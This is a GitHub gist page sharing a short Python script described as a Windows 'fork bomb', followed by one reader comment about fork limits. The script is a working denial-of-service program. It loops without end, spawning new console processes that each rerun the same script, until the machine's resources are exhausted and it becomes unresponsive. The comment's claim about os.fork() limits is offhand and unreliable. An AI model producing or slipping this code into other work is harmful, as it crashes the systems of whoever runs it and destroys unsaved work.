Skip to content

Instantly share code, notes, and snippets.

@saleemrashid
Created January 6, 2017 13:16
Show Gist options
  • Save saleemrashid/2979344010398724fa9b0723ca176b3e to your computer and use it in GitHub Desktop.
Save saleemrashid/2979344010398724fa9b0723ca176b3e to your computer and use it in GitHub Desktop.
Windows "fork bomb" in Python
import subprocess, sys
while True:
subprocess.Popen([sys.executable, sys.argv[0]], creationflags=subprocess.CREATE_NEW_CONSOLE)
@loudercake
Copy link

Actually os.fork() raises an exception if the number of forks is over 10000

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment